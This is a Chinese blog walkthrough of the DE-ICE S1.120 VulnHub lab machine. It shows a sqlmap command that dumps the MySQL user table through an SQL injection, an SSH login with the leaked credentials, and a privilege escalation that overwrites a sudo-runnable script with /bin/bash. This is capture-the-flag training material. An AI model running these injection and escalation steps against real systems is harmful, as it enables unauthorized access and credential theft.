DE-ICE: S1.120打靶【附POC】(权限提升)

*本靶机为默认静态IP,记得将kali添加一个仅主机模式,且将IP添加为静态192.168.1.0/24网段*

靶机下载地址:https://www.vulnhub.com/entry/de-ice-s1120,10/

目录

1. 主机发现+端口扫描

2. 进入80端口WEB页面

2.1. web页面

2.2. sql利用

2.3. *逐个尝试连接ssh,【账号密码:ccoffee:computer】

3. 提权

3.1. 通过SUDO提权【无权限不可行】

3.2. 通过SUID提权

1. 主机发现+端口扫描

静态IP:192.168.1.120

2. 进入80端口WEB页面

2.1. web页面

  1. 进入【Home】主页面,点击【Add Product】页面 -> 添加一个项目,点击【Submit】提交

  1. 点击【View Products】-> 点击【Submit】

  1. 存在可以的sql注入点 -> 尝试闭合

2.2. sql利用

  1. 故可能存在数字型SQL注入 -> 尝试使用sqlmap获取更多可用信息

  1. 利用sqlmap跑取用户名/密码
sqlmap -u "http://192.168.1.120/products.php?id=1" --batch -D mysql -T user -C user,password,host --dump

2.3. *逐个尝试连接ssh,【账号密码:ccoffee:computer】

尝试kali连接,存在报错

Unable to negotiate with 192.168.1.120 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

尝试本机物理机连接

出现warning时,稍等片刻输入密码 -> 连接成功

3. 提权

3.1. 通过SUDO提权【无权限不可行】

寻找用户使用的命令 -> 权限不足

sudo -l # 显示了允许当前用户使用的命令

3.2. 通过SUID提权

  1. 寻找SUID文件 -> 诸葛测试

find / -perm -u=s -type f 2>/dev/null

  1. 尝试SUID提权

筛查过后,常见/bin目录不在常见的可利用的SUID提权文件 -> 另辟蹊径 ->发现存在一个getlogs.sh.bak文件(如下所示)

  1. 由于他存在于我们SUID可执行文件中,故我们可执行getlogs.sh文件中的所有命令 -> 重命名为.sh.bak后缀文件【记得转移至所述文件的文件目录下】
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chomod 777 getlogs.sh

  1. sudo执行getlogs.sh文件
sudo /home/ccoffee/scripts/getlogs.sh

  1. 执行whoamiid命令发现提权成功


 

  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值